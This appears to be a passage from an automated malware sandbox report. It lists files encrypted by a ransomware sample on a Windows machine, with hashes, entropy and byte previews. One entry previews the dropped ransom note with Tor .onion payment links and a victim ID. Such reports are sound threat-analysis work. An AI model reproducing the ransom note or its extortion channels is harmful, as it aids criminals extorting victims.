                                                                                                                                                      C:\Users\user\Documents\EEGWXUHVUG\PALRGUCVEH.mp3
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.017380526919604
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:OpZMiaGRMIh9kIJT1nfQIntetzCwgck389g:OpMgMIh91JThQct4zTEWg
                                                                                                                                                      MD5:778767120CC831D2C321C0D455929245
                                                                                                                                                      SHA1:A7544B99748EEA98E36CBF5B7026C49F577A68AA
                                                                                                                                                      SHA-256:47ACAE91F9FDB4842D273229DE921C59CBEDA5C260667A10924EC680DA329837
                                                                                                                                                      SHA-512:5FB86F5C6B344D957A8A5FE398F2D93C5D16562060E88C87B3E4DB58E08B43535BA449648E20208DA8DEAD59FA7F768EF7B001083999AE5BF88B5E48BE636E3E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: >...n[.4J...!:..n.].,...p...yIx...<.;.t..V@...kT.}'R....;..PQ...d...........U.DA.v/.u..>....AL........r....V.gl..9..:.W..a......r..F.q.J].....?g...D..^;.U.p.e...xE.t...G.@9U..'T(..P.f~k;.!.[88.!.\."..9}?%........9#..K{.....<L..5.?>.<.............p..+[...AY[.1...\.U..xA..~.B.......V4.14....*W..*.K.C..V......d.\.Vpu._)..3.c...1W...{.d.....&.D~m..=........q.@......TY.........;XH9.-.*..i.......".v..=...S.^h}.~..gP...(...%....d4}R...18...vIw.[:.}.X....Rg........|().%....xe......e.;..4..Q...i7.(Ti_(........R..T..@a..G......T.2.....).0.....!.r..p.^...v(.'..<......&.7..\i......VN.LQ_|im...Gx4<..i....sC.3..1.TR.kTm9.[.k.I^.?_....g......./..E.sv.Zy4.w.3H^.J.A"...Ex.jA..{.....*.?..>.-6....S.-|...1....).."..f.C.k..4.7<.2.H9e.;.9Q......o..5S..1k..h.|.)n2.LH..kE.......(..oJ.s.e=..Y ....Ez.h.l.te..;.3A.6.ZVo...%..D....=Z.}.y.:.B..|....J...E.=.9..\....F.....vU}*........r.-9.2.u%.1...V.L..#.$.e>.....zj._D..Xhw...\s..f+..HkaZ;.*....\.q.}l5...nK..z.<
                                                                                                                                                      C:\Users\user\Documents\EEGWXUHVUG\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\Documents\EFOYFBOLXA.pdf
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.020579471261584
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:lhbS9iqSIF5ac9J5xEMcB2ArMSpEOzCwgck38bABl:Tu9i5IFgc9Jj2eOzTEfL
                                                                                                                                                      MD5:59FBB106CE1F2EBD1165D1924731A0E6
                                                                                                                                                      SHA1:501A6996F39F82A3030740F6B44F1AA4D77EDE4C
                                                                                                                                                      SHA-256:16B26CD00300A4FADE9BF8595B2D793452CE7E455007F719AA9AEDD1CA88A971
                                                                                                                                                      SHA-512:42F32C2318ED5E94053A89A9D0EB51DE4D64878513BEED5DBC46C18D995B3210B4D3874BA4A47FC7F434A10011632B8880CB0DC09A893A245FE5E12FFBCCBB3D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ......q...m....r4D.....z.......BH.LUT."...B;...G.gM...o.i.D.t...0.Z.K..m.Y......&.H..VL/.A..&;=..e.~..............Rn.o?... ...xCO.Xl.4..&~..j..pe._mc.,..\.=...9....ME.Q..F8..WL..Qs....Z..........L....X.. ^..^.$`3...7."R...".:..r]=Rz.Q.|...,./..H.....W-.H..IB.. .?...e_BU%..b;U'...~j.......ojcU....N0V1....M.k..i..8..o.r..e....a7.X........v.9+.....W.O.e&....9m..xWr..$L..C.....d..L.Z...../..gT..F.#w~...5}fvu.......i^*.H.V.O.mg{.G...u6Xx.s..yW.Y.r....5..S...b.?1..7..+w7.4".^.T.]...#...g....JUT[...#Y..?....4.c.u9Hw.H........N\..d........#.td}?.*c.#....m.{~.i.....5.Tl.i...W.}.....q..~e6.*...:*8..|.q.b......J...B....`xn.C..S...d.ayr.....9.N..e...$:.]..l~.wSwG..a(US..N.~.d.0X.......N..Sa..1...Rt...u.V5.X.W...'.J..sql.&..Dk.....K.G..7..!..Zh..?..3.....,.....4..a2...>.P\)..FD.24..7...k=......NU...g10.`.t.+.rh.)...6...r.l..Y4.-.jpSrt.Ih.2....1I*.b.f.m..\.?.M.&..jkUT.Y.(b..}....!._:.2.d.}%".f..8..J.C.oP...h...a....BC....[].-q.F{{i$..z=f.N...xX.._
                                                                                                                                                      C:\Users\user\Documents\EIVQSAOTAQ.png
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.0112232164394985
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:8lrsc+zKSGb3Tp9/qFq6TVLftvOYSWTpaE4z4/pHF+CidpzK8sevWAVgKTaCB7Rf:uscWAbTp9SACZ4YSipszCwgck38R
                                                                                                                                                      MD5:84A5B7E577BB5E3C25AF371C5B07FDED
                                                                                                                                                      SHA1:EDB749CBB643DC5EA04A4070C18DFD088BBFAD78
                                                                                                                                                      SHA-256:BA2502DDF4B4996D5530BFC41EA6B8E56BCEFAE3877B334C3F5EE03D1820F01F
                                                                                                                                                      SHA-512:627FD1AECC8A7D0221F0C258FE66CD160185F12B369E1EE42D64B983E2F6535D2B5DD518A252554CB4EC154DAA4E9BC825045648EF788983F0C8C3E49D284D1B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: B.....=^.lG..b....iXl..2Q..n...g.m..)!.8a.u^IO..e.).n0..L".).|H..>.n*.z..:......s...6.v..5..<.b1fV.Tz..3U...?8.....b .s...Ur.iHq.)...+/ld.|u.*.....|z'x.@....=s..2..(....!..u.......7...u..awW1!o.:6PH...(....3......vd.-V...H.....}..t`.-4B.{..g..n..Hi..1....Q..Z..z./..K),O..:X.&].....U....4.......n>Gg_..F..qJ..P..).....uh..W.......t...5@......../.]&J1.-50r7..A...-..)*.......w......*%......N_.n.....~f_.S.<...&v8...[.?...c..U........EM......v.j..B-W.!_.w..l........+.Ak....j.e...#$..C\b..#h...T.9..=n..7...>...$]#.....u...J.&..q.}.1gw..<.}/.8 .0.<..a.....|.k...h5.. ..z.[..>..8}^..=...N......}..`.u.......T....)M.n.#s......s....7.r.1v*k......yb/uW.I........=....W6..t3.8 .j....B+4E....t...w(d~_...O..i...K{..h.....z...AN..E?.w..&..@.S...@![....>....[._N"..Q.mE0......+:..._'.......W9o_.<..Wx......'.T........et.Ek....Lq..Q...^&.......xmM..6~X.+1..>..[..]....+H^.X..).g..&n..`.|Z./) .|H&...XlEM...Kw. ?....zA#lF4.b....L.8S..;....=.Z.^Xu..R..Q.#wV..\.xy
                                                                                                                                                      C:\Users\user\Documents\EOWRVPQCCS.jpg
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):6.99290218042401
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:f504y7TEH0kGHsydGXReUpBsdniGwNsq0joUv0HbZj4b9eF/zIDeLq7zK8sevWAs:REUgsydGX0U0Ssb07ZZF0DzCwgck38E
                                                                                                                                                      MD5:D05A8FD1197F4A3B42E16F5B68B32DED
                                                                                                                                                      SHA1:4129F679E76531FD4FA8B25694865F5B77FEF20D
                                                                                                                                                      SHA-256:85F428B70CD893FE138A5F9C9F5743BD64144C87D6FD04404C6DFAA16CAAC93F
                                                                                                                                                      SHA-512:FCEAFA9556EFC46955150CA3ED11F058B24A917134881CC1C882641FEF8B0B826E8D2617FE2C24AAC7768101CEBE8E2D8DB9E5A546257DF264DDE55C578650A1
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..JK[...k.F.o..k...9....O2M%.z......mf.0..G...-....b.......zB*A.:k...M.........-..8...6.d........x...3e.A...i...O'.....3......GE[f.du...G^.T.OP..;...A.L..[.9.[N&'.]..6..IQ.q:.E..ol.V...1..1 I..w...Pr-..`.......&.*j&.gLe.x..{.D.{!_...J4E.....>........!.$.i..u..]."...R<V_..5...8...7Z3..wr....f...*..S*RL.&.3,..w.`..v*.R.:..R.WN5..5....GS...#9....8.](J..].8}.0.^>..1..r.;2.Cz..g.BQ...H-.C...cV..."q8..+T).3.z.=y..jA.8u...]>&.U,c..}.............,.>......"X.c........jk...Q.8}.L+......v.%S.h.^I.&...&.iA......C......pc...3Fu:.m..W..V.{\.^.Z..}?..K<.S.n...J .1...%....T.\..f..D.$)J......{`.,M...........I....K.`H9.... )....=0R!.iBi.."n<.......|P...".|...O2./..k..".<..^Pb.....hh\..J...G+G..Ju.0..........2.a....%...mRX6..P...`x{....`.]..]. .}.v.3;...YL.....B.!.m.*.T..J.Z.....K;.y.....j.'".E.<..]...Q.@.x.A.h........0.R.>...........\....b..........M.C.E..`..6|...8m.!..r.V0....j#...... . .i....Hv....pp.M|...@.z....<.wA..xP...Wo....}<.^c,.s.N4....v..[.&..]oE
                                                                                                                                                      C:\Users\user\Documents\GIGIYTFFYT.mp3
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.012616288401591
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:Jj7NGbcE445p5ZwLS1Crq3BoGiqE+s8NPOOPp8gR3zK8sevWAVgKTaCB7RZ0cHYx:1YbjVpHH9vNmOPigRzCwgck382
                                                                                                                                                      MD5:E91814A52C9C868B74DAEC53B8D97A21
                                                                                                                                                      SHA1:F05502E58D000A0EFF0F33E99F836B5C66AD5103
                                                                                                                                                      SHA-256:85902C766EE6B36F171AD57DB2A0102D23257872B0A4B62B67A97A45A2E2DB13
                                                                                                                                                      SHA-512:2CC39A2580DE271440413DB639C2FB0E59E81ABAB45B2B1705A053279977223FE766AD7028D34A5D74F94BB312E4E20ED3A11B6ACAF0C149C5D7A01B8FE116B7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: n.......,../?..\....8......>...p_....1i...w.G.yp...k.dO.."/.....`...,3.p....l...|.x-dc........'.....7..[.....u:..ZEP.,..G.~R..P..LPA\...fD.O.........d6+D|....<...7....r.D..Q..R.9.Z;2%3.`#.Y+......t_;0j...t-1..Z.nm..6.D.cY...<..b....q.*aN...S.R[.b.../rdk.Z...t-....HK.....S.l..<.....m.A$....AH..".O.Z....'.0=.......g.CS.....v6......L..,G>..tS.d.....>p......Y..w..[..x.K.!..)[g.4.D...(...H..N..#.R.,.G....c0........S.'...t..*).......7A.T)u.~.p.Y.cs.D.FtH;x.M.._^<)...FK-+b3.....=s..l....`..l.[J...9.).z..<x.%l..4..+...k.(....G..3.:....G....^......w.v.B^..^%.8|.`I.]]g....ns.%..m...)....^g....8.Mr<:..p<......`]<....#..G.W.+..q.S..y....G....L_>e..".waWf<....h7Z.....-.7..7..2;U]M.@.}2..:|... .r.O...E..ge......._Em..p..`....p....n.:.o..<.)...t..Rt-qOY..d.J.w2..A....4...K......u....2n.?uS..%..e....{........./..jh.\...":.PQ"...S,.!.s..=.."........v...}.mJF...x..*.3......c...@Z.).........q!.Z>.s ....].A..I'..r8...i.c. #.`.+zdpG:(d.............T..s.P;.qE
                                                                                                                                                      C:\Users\user\Documents\GRXZDKKVDB.jpg
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.026898625212568
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:ZKcZoLLK5dIYGlY6OdIzHEOUOzCwgck38qYS:ZmKfIYGAdIzkrOzTEL3
                                                                                                                                                      MD5:6D3F6FAD7C8995E5E09887C55A90F508
                                                                                                                                                      SHA1:4B7A6EBDDE47E0F947C96029045347835CA70F86
                                                                                                                                                      SHA-256:9D02F9E703556DB9C8A1B56328B8B314BABD654B6C4FA2376575FD6D71892DFD
                                                                                                                                                      SHA-512:081337609839F30C5E922E69EEE241BB1CB85969A1A46D0E1B6A62C646CC6A3B4106831963D5E67717F61EF1F5F67634D82B1B3D2E021D2A7F72767DF645A32F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .-......~J~u5.F..z5....hJ.>[.5..Ta.n.....7\|..84....K*VL..t...j.~L.Z...yP..T....U.l...,.a.......P.5....Sm$..'.Aj./..~..7.Z...e..C].Z..7....R.L..#B@..n.*U.t@.....I.C..F...Qc~...#P..Q%...x.W......../..:.!A.aT."|..>c...m.v...b..$....c..\.]....".D@.....UT.X.j.....S..d.S.=?9.....s.p.1`L.X......oJG..S+k....)..O|s.gTdYMM.{.$..:.Y.c.V.-+.<.0w.g.0M.m}.-;........^Lt3'@...9....<...g.t...1.]....Q.....M.... ..#..s...,b(/........m........(..2.g._]......9...J<..qk2....6+..U....{?...[......7fA.:...z.uJ...4.......'.3...z..Z0..Z(<.<.~6.h...x....N..^..c.u.6..o.Qha.p;...#.O..LCD.$..b..n.J.....1......Hm...S....M.......T..C*._..8.]Z.*.e..9'.....Z...SK....&.%...z..f...RH.W"k.~....g..;.8..x*..).O...ac.5...........O...' .s./:..#&q.S..8.......?.2lu.On.6=....N......^.l...1..?2..wB....C.L.W.yjo.3.N.oyV...b....t..s8.<..EB...~.#..Gi...~...K..iG.j..3Md....l>4y.El.bn..I.z$......w...._I....k.VE-%......Y... ...R...].V..N.....nk.D.g.0h..Mz.Xj.G<s..A}...S...j....
                                                                                                                                                      C:\Users\user\Documents\GRXZDKKVDB.xlsx
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.02785215792494
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:VGY6SyZ4Y1dKzNBWQ2KP5/qXnEVXvQoGWX3zK8sevWAVgKTaCB7RZ0cHYIgtyUzr:VGqyZJdK/X2KP5/qXoXvGS3zCwgck38e
                                                                                                                                                      MD5:A13AD3BDFB602571692B4C4472681E09
                                                                                                                                                      SHA1:321674A5F441D601DB842920A158203F15FED3E6
                                                                                                                                                      SHA-256:237C345BADDE5135CF1138F90816A0D3986D98871341E2172E959F1398627519
                                                                                                                                                      SHA-512:49234236367287A1EBEC63F34D05FB3142921F4108A79D83E5CB2F2CE154B0F6EFA37E75AE728E45A803973C03A8954DFBEB0927C84416B575B24C2E721A3C2B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .*..Yd........}|.Budh.IR.,-U].oa_D{|...Z_/..%.....n..6........8....].N..~.I....y..tK..o.r....(?.\.TnY.7..m.l..b....%...:...Y....l.i.:fp[L..@/...2..N..\r......`\!.i'.F.p...R.Tv...7...HT..8cw.[..K.....N..`.:`A..(.+.2...n[..........[...-..C..#..y..;..n..27@H.w.~...M. ...>...,....=e.[4..o./.&.p..Y.....b~Q3..P-..O1.):...I.......P....v../E.....zQ.@....M.a6...S.Vl....?g8-q........;A..m....?..}..(...hW%K..w4.(G.N........`..E*.Xv.DR.b.i!...A.x.Qzu\./$.NVh....+<T.-WV...4.P..4..`n6.%4...%...A....D..|.. q.&%..ra......m,P...e..../....>...~aw&...m+..;J...=.~_.+.7.......N..J...D..,.E0.Q.]...GS._......C=....sX..R>..LF......>.s.t....5...^......%.bY..;..CcgO~#!.^.v..u...G.;J.....x=E{..R...Hj.j....T."+uO...ZkkJ\....r,.n8_.:.2..v....h.QR....>......Eg(....#t-....,.O.j..\K...j.8^].X......-d..O.....,.".1.1.....k.2..!7i,j.._..|..7.Q.jW.hu.\,....s..z..7..P..t.:.NBW....p.o...}.].BOa..@.<.h.Q!...k...*...v..d..y.\z....{...?~.7*.Cm_.sT....g#.....A.~..)...|u.J.
                                                                                                                                                      C:\Users\user\Documents\NVWZAPQSQL.docx
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):6.9975657250912695
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:zK0ulIjB3bRT+cdWPNTXuzOAknSr3uvjzCwgck38Rff:MyFAjulgSjuvjzTE43
                                                                                                                                                      MD5:DB9899FDBF675434F3AA992D1E005447
                                                                                                                                                      SHA1:C469FA120661E58FD09A869B580245D4F776A527
                                                                                                                                                      SHA-256:DE7CD84118D8FB30E3F31C013FDD5919A3F4855AFF325CC04E1E68E4D3CF8506
                                                                                                                                                      SHA-512:61697E1E0CDBEA2BC7737409DF3EBCAC77E845F23FA27DA6509FDBC05F31057F7D17043A4BC1C82D79BCD4A503714A751B8309EF19F1095630B7685DD055F5AC
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...e#]e....;...9.Fg..i......Q..6.I...^.~H-(/.....+.=...[C.@Dd.%.....\..X.Mq...|.a.........../=../..j.;...#.H.5g..VP..%c.G.......?.#g>..W.J.1..H|$..\.f.t].Fm.&.....{.i.B..C.I.W..I.X...Uk...:.(l..e.s.F.W'..).I.t.~...... .E...I.rt..$..D.`......mW.d....y_..3(I.....CQ...>.3.h...b.R.7.;.r..>a.....a.V.(.b-.$..O.....o^.&P.+N...7Y.........XN.iW....>."..Y$.hV...ZZ..$fk8(....p..yC1s.-..(..;$.....(....4T.]..a.A..XN[....|..x.p.K...K..k.H...r..E.,.....?A.R...~.RVhy...kW..^N.~1..)...$<.5'..3......&5.w..@V3...R[.@......d_.XR.`T.].%.?.3.G>w+.>.. <.(#pZ..*mx...'y....9.h.e..pFs.D.B-....e.....@......K...........q.'.....-,...9....XHJ..l.k.o~...,M...i...]..p*.?:..qq6..F......W.I..a.]2..4.*s8Df.W..W.N:.E..-o(..P......gL..[..0 ...a.....@.)KuI.r.U..^C.... .X~....@..7.W...w.b*.q..3/......K.B..-.k.......p..`.h.f........+....W5.-!..&)!.j2..$.qwo.O.AA...W+Q.A ....2;p...:..$c.Ve.......#Y..:.z....t....M.........n...H..<.WW.....-....2t.b.....1K..c2.?.1..qW...
                                                                                                                                                      C:\Users\user\Documents\NVWZAPQSQL.xlsx
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.030524595324611
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:JDYpufdtJTfBqVxzW5s6xUJLiNebuSURF1v1Qu4zhaSJ6MqOozK8sevWAVgKTaCV:1JfJfBSxz6LcidRqp1HyzCwgck38n
                                                                                                                                                      MD5:DD7F99446D275000E9D77C33CF06E2F9
                                                                                                                                                      SHA1:43CC07345FF597544AE62BEEED053EE0310F9787
                                                                                                                                                      SHA-256:FADFF681468FDC45FFC35C1AA353795C41AAE30DBC2B821E5F2A3A915E2CA33C
                                                                                                                                                      SHA-512:0A5E4F0076F2EFD9C930E71C0D6B508D23357599070F1612F0DB61F4351899940A2C72C857DFF87FF6FEFE8347168004262BBA6E519F0A7AED268CFB7D067873
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..5.......3mT>.L...z.,V..A...8..g.....8.S..n..!..C.^L%..Y@e>9..]Q[...........`w._.....L....l..,..=hp.g..'#.*.]O..Y.......U....R.6....:)..;#.1..l......\.c.D.o.G.q..x.0!...t..r..m...E6."..o0.i..\..C.....7=xF.km....WX....i...@.$n..G.)M.<...eF..T..3..}+xmoE.q.Z.vc..y/..)SS..).......Q5u{Q.W.[HE.@..Q&..E.....=.......Dd.s.EG,.F-...*..Y............8....~...!'...{..$...Q...$^....W.....hQ.......e..5..4.J..>.A....b...&qD....BT.WD...~.A.9Y.cPS.$...C..s6VC.N&..I..@..Fr`.fB}..qk....R}...Uw...O..!....T?09....q./.n.!....iE.E.U....)...o|TcW.g..2...vp.\...2d.#.1.=.!.....C.V..l.....?........bt...Oz.Y....L.@ \vK.j..JcKg..;..^.%..#..G..{.+..V.r.&".NJG:..`..[...:.4.H.=U........a.D...g..3.t.H.O...f..)d)I#.@...\S........Kf.5.%..@....e.Fgi._....\D..M.....KI.8'.b....j^$.n...o..Z.r.S)Q.T~.'..;.[.wy-1.....@....*...."......~......c.8.. p`.h....F...&..ye.f........]..S.......-..y.X>Rd}.%|XS8:.....(.$C..H.Q.;a.v1...o'...n......E.KJm..GF'..&..d$m.H..p.....C..x..,..V
                                                                                                                                                      C:\Users\user\Documents\NVWZAPQSQL\EIVQSAOTAQ.png
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):6.993822931592102
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:vMUmdhosmWpH8Uy2V623bspBFkC0d3kTCq5Fog01aXmAqzK8sevWAVgKTaCB7RZz:3mPiUy2V6k+BFkC0KDo6XOzCwgck383
                                                                                                                                                      MD5:11FFD902F678CB0A5D50D2F418331E89
                                                                                                                                                      SHA1:4306D34C5F8C5E6D4644D080B329C24A18494AB7
                                                                                                                                                      SHA-256:ACA4FF94A6F7815A33853864614C6BD5B29A5388AB8BCE5258EBBF6C5A0E1C8C
                                                                                                                                                      SHA-512:76AF28C7195446143E65741D38C9CA80CA8C90589C34C3F64B9FC2099FC8875475088BD09AF0142F4969C65BA3460ECBC4B85DF6365B7AC52F525741255770CA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ^..6.i..q:....VimL2;By..1h.n.J.I.....E-.`cq...'..([.u....X.....e}b$..........Y....I8....ipe.V.U.b.Y2..&.5.xV_<A...r0h.B.SW..58...Dk@....sZG....l.].Z...A.>...>...f. ?......x...v..d.6Tm.m.~..SA.|.=..$g..)..........e.3U..Y..h.Q..y.E....@...Z...&:..D[..1.r.W.V.4.^4[..Yfa(...w...i...\..D.NC-A......2U...+.U...s.\.(vx.f}...M..G}....^...n.9..~.......,......)..R..+m...q...v.5..)..D..Ha..mb.../}?.z=..J...9...V..!6.|\5+..[.X.h..-|.....Na.Rq..J....(.(g...t\j.Pc......AfP.4F....hHT>.S%...}.+......R.3.>.K.'....0.?.........l.WJ..;....4.....l.a,.C......W....L%j.)....8Q..?...Q....C..%.m.=....2....5n..h.......'....[....Rpw4.;E.M}..F}..W30..)^EZ@B..`...'.B...s.0ZP..Pq.ED...............m...H.....~Z..W..D[r...^.X"...:E..j...Q...2.....G.L-d..3..~+LW.X8DL..n......D........3..,q..:.ab.A...U...E6...>c.#.3W....D.Z.w...d..@...J/..........E.x......-/`uT..Z....#.f..Hf.D@.#...>.n..e. ..m.dl6.|......t.^..........<.j.. l...!..*.;-.@.n:..^.....<K.s..Ga.z.....G4.v...
                                                                                                                                                      C:\Users\user\Documents\NVWZAPQSQL\EOWRVPQCCS.jpg
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:SysEx File -
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.015236891587946
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:gvVqSCNQue5W753UuS4XmPbw/zSzsZLzCwgck38vYl:gQBQucW9pQbw/zSeLzTEl
                                                                                                                                                      MD5:EE66D524B17DCE3DAD4A02D2A2235CEE
                                                                                                                                                      SHA1:08DBF34A576A17B89B4D58F6C4E8283A64700637
                                                                                                                                                      SHA-256:1364F895EB553452ECF64EAB6546157DF91D73171FDB29FE5EF97690178A2784
                                                                                                                                                      SHA-512:1B326CE8799F510DF9EBB656355511DB65F3C2190484ADD76386641ADBCEB9C91634D587B5836C9B839C45E2B776563E66A1328466B4A1AA509F339E2C087D8D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ._.G.....e>*V.4l..M.l....o{`...Fm-=MiM..=..s.1r.."....;5..r.C....!.N.........-..:.hK.w..,.>..C...F.jPn!.....O.%@.-...nF....j.y... Wy.T..8.I..`......X.N.X.*.../.d.r.%j.9.sv.,...u....d..L.0./.~:.uB/K.(.....g..=.q."c..T...0.....X.....kN~..C.v.I...e.u.l-.:.F.Xz4l..v...r/N".h.... !.-........|..;....}....Cp.c.N....l......P.[p.......q95..XT.~.k(1]v....'r..I.>..9....&.y...@=....9RwsJ....Qx.\A. .?.O.F.X..4j.2,.;.s.(...q...w...1h.....s.6..Q....v.y...r..~m......| .../.A.n..'.G.=Dn.f...j...D.d.*........k.E....~.q...}lW..g...._q.h..bz......x.....&.y.,Q..[a..'2.Z+.*...-......QT...@0<..G..C.8$..q.0k&..}/WI...l...a...IJ.V...G..5Q..xq."..La.h...3...m.G.......X....N+:......L..........[....c.N.7c.q...O.8..p......#..q....IV....L.....6.F.....T...B.....K.........!H.<..V.+...K..._.....@.(....%.....u...7.....~P<.....+..x.Q..e...U..J:.?7..Gt9...tA'x.f...K?D&..%..@,s}-..E......V.z.../~7....9Tx...RWP.^.].......))U.9. 9.q..y .{.j}.T....:....H..<?.q$o"O.AM..5>..Q.
                                                                                                                                                      C:\Users\user\Documents\NVWZAPQSQL\GIGIYTFFYT.mp3
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.0134135726084175
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:cjM7w1wHhXsDsmRkY9hy8YLHzfDEcngzCwgck38t:UIw1wHIsmRtOzfYtzTEe
                                                                                                                                                      MD5:73C97724B01345CD97F7399F5C787860
                                                                                                                                                      SHA1:28248B93EFDAD5D0456A65653B36CFF8D26C4923
                                                                                                                                                      SHA-256:D1125DF14A3A92D15B293825CB29393B2F8A477D7C9612BDA1903FF0F87B58F8
                                                                                                                                                      SHA-512:8B7091BC69E4D2639CC40D51A51D89CEA022148210D3E4161FDC3CA5909181B7B8FF2590FFB746C89678011471CCB27CB106CD4BC7CDBD4697E52BB5B0658A93
                                                                                                                                                      Malicious:false
